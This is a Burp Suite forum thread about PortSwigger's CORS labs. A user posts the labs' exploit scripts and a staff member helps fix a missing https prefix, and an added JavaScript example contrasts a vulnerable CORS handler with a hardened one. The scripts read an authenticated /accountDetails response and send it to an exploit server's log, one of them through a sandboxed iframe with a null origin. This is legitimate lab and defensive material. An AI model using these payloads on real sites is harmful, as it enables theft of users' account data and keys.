Burp Suite User Forum


Facing problems with CORS module labs

Antonio | Last updated: May 03, 2024 07:27AM UTC

I'm trying to achieve the CORS module labs but something seems wrong with them. For example, in this one (https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) I face the following issues:

- My exploit, same as found in the Solution section:

<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','0ad900cf044f78d4845e81e10014002a.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
    location='/log?key='+this.responseText;
};
</script>

- Error: I get "Resource not found" in the log page (key parameter). After inspecting the request with Burp I can see that the session cookie is not present, so I get an "Unauthorized" message for the /accountDetails request. If I change the exploit, adding the "https://" prefix, I get this error: "Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://0ad900cf044f78d4845e81e10014002a.web-security-academy.net/accountDetails. (Reason: CORS header 'Access-Control-Allow-Origin' missing)". Inspecting the request, it has the right endpoint, but the cookie value is not the expected one.

In the following lab (https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack):

- My exploit, same as found in the Solution section:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','0aee004b04bbac1980ed58c600a500ac.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
    location='exploit-0acc00f704c1ace18096571101eb0001.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>

- Error: It is trying to read the resource "https://exploit-0ab7005b04fe6c91800ad93701970039.exploit-server.net/0a49007a04786cee800cda1b005e003c.web-security-academy.net/accountDetails", so it fails and gets stuck. If I modify the exploit, adding the prefix "https://", I get this error: "Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://0a49007a04786cee800cda1b005e003c.web-security-academy.net/accountDetails. (Reason: CORS header 'Access-Control-Allow-Origin' missing)". Something is wrong, because inspecting the request it has a null origin and the right endpoint (as expected), but the cookie value is not the expected one (as happened in the previous lab).

Ben, PortSwigger Agent | Last updated: May 03, 2024 08:41AM UTC

Hi Antonio,

Out of interest, if you use the https prefix and deliver your exploit, do you subsequently see the API key in the logs?

Antonio | Last updated: May 03, 2024 07:30PM UTC

Hi Ben,

Following your advice I have used the https prefix and I can see the victim's data in the log section. It was confusing me because I was trying to reproduce it by myself as the wiener user and it doesn't work as expected; I cannot understand why it works for the administrator user (I have tried Firefox and Chromium). Thank you so much for your time!
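The thread's root cause is URL resolution: a string passed to XMLHttpRequest.open() without a scheme is a relative reference, so it resolves against the page that runs the script (the exploit server), which is exactly the "exploit-server.net/...web-security-academy.net/accountDetails" path Antonio saw. The following is an added example, not code from the forum post or from PortSwigger's lab solutions; the origins and allowlist entries are constructed. It reproduces that resolution with the standard URL API and, on the defender side, contrasts the two lab weaknesses (reflecting any Origin; trusting the literal "null" origin) with a strict allowlist check.

```javascript
// Added example; not from the forum post or the PortSwigger lab solutions.
// Origins below are constructed stand-ins for the lab's exploit server and target.
const EXPLOIT_ORIGIN = "https://exploit-example.exploit-server.net";
const LAB_HOST = "lab-example.web-security-academy.net";

// Resolve a URL the way the browser does for XMLHttpRequest.open():
// a string with no scheme is a relative reference, resolved against the
// origin of the page running the script (here, the exploit server page).
function resolveRequestUrl(urlArg, pageOrigin) {
  return new URL(urlArg, pageOrigin).href;
}
// Without "https://" the request stays on the exploit server:
//   https://exploit-example.exploit-server.net/lab-example.web-security-academy.net/accountDetails
// which is the "Resource not found" / missing-cookie symptom from the thread.
// With "https://" it is absolute and goes to the lab host as intended.

// ---- Defender side: what the CORS response logic should look like ----

// Exact-match allowlist of origins permitted to read responses with credentials
// (constructed for the example).
const TRUSTED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

// The weakness the two labs exercise: echo whatever Origin arrives (lab 1),
// including the literal "null" that sandboxed iframes send (lab 2), and
// allow credentials. Any page can then read authenticated responses.
function vulnerableCorsHeaders(originHeader) {
  if (originHeader === undefined) return {};
  return {
    "Access-Control-Allow-Origin": originHeader,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened version: only an exact allowlist entry is echoed back. "null",
// unparseable values, unknown hosts and suffix/prefix look-alikes get no CORS
// headers at all, so the browser refuses the cross-origin read.
function hardenedCorsHeaders(originHeader) {
  if (typeof originHeader !== "string" || originHeader === "null") return {};
  let parsed;
  try {
    parsed = new URL(originHeader);
  } catch {
    return {};
  }
  // URL.origin normalises scheme/host and drops any path or query noise.
  const normalized = parsed.origin;
  if (!TRUSTED_ORIGINS.has(normalized)) return {};
  return {
    "Access-Control-Allow-Origin": normalized,
    "Access-Control-Allow-Credentials": "true",
    // Responses differ per Origin, so shared caches must key on it.
    "Vary": "Origin",
  };
}
```

resolveRequestUrl() answers the question in the thread directly: the scheme-less form is not a typo-tolerant hostname, it is a path under the exploit server. hardenedCorsHeaders() is the check a service should apply before reflecting Origin; note that it never emits a wildcard together with credentials and treats "null" as untrusted, since that value is trivially obtainable from a sandboxed iframe.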
